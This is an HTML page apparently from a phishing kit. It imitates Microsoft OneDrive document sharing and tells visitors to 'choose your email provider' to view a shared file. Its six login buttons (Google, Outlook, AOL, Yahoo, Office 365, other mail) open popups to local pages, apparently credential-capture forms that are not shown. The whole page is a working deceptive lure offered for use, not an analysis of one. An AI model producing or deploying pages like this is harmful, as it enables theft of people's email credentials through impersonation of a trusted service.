
<!DOCTYPE html>
<html >
<head>
<meta charset="UTF-8">
<title>One Drive Cloud Document Sharing</title>
<link rel='stylesheet prefetch' href='https://fonts.googleapis.com/css?family=Open+Sans:600'>
<link rel="stylesheet" href="css/style.css">
<script type="text/javascript">
<!--
function popupwnd(url, toolbar, menubar, locationbar, resize, scrollbars, statusbar, left, top, width, height)
{
   if (left == -1)
   {
      left = (screen.width/2)-(width/2);
   }
   if (top == -1)
   {
      top = (screen.height/2)-(height/2);
   }
   var popupwindow = this.open(url, '', 'toolbar=' + toolbar + ',menubar=' + menubar + ',location=' + locationbar + ',scrollbars=' + scrollbars + ',resizable=' + resize + ',status=' + statusbar + ',left=' + left + ',top=' + top + ',width=' + width + ',height=' + height);
}
//-->
</script>
</head>

<body>
<div class="login-wrap">
  <div class="login-html">
	  <div class="LogoOne"></div>
	   <div class="foot-lnk">To read the document, please choose your email provider below Login to view shared file. </div>
    <!--<div class="top"></div>-->
    <!--<input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Sign In</label>
		<input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab">Sign Up</label>-->
    <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--google" onclick="popupwnd('GGN.html','no','no','no','no','no','no','300','100','400','400')">Login with Google</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--outlook" onclick="popupwnd('LL1.htm','no','no','no','no','no','no','300','100','480','480')">Login with Outlook</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--aol" onclick="popupwnd('AA1.htm','no','no','no','no','no','no','300','100','400','400')">Login with Aol</button>
        </div>
        <div class="group">
			<button class="btn-3 loginBtn loginBtn--yahoo" onclick="popupwnd('YY.html','no','no','no','no','no','no','300','100','400','400')">Login with Yahoo</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--office" onclick="popupwnd('OF.htm','no','no','no','no','no','no','300','100','400','400')">Login with Office 365</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--other" onclick="popupwnd('OT.htm','no','no','no','no','no','no','300','100','400','400')">Login with Other Mail</button>
        </div>
        <!--<div class="hr"></div>-->
        <div class="foot-lnk">Get to all your files from anywhere on any device, and share them with anyone. One Drive your shared document in one cloud. </div>
      </div>
    </div>
  </div>
</div>
<!--</div>-->
</body>
</html>
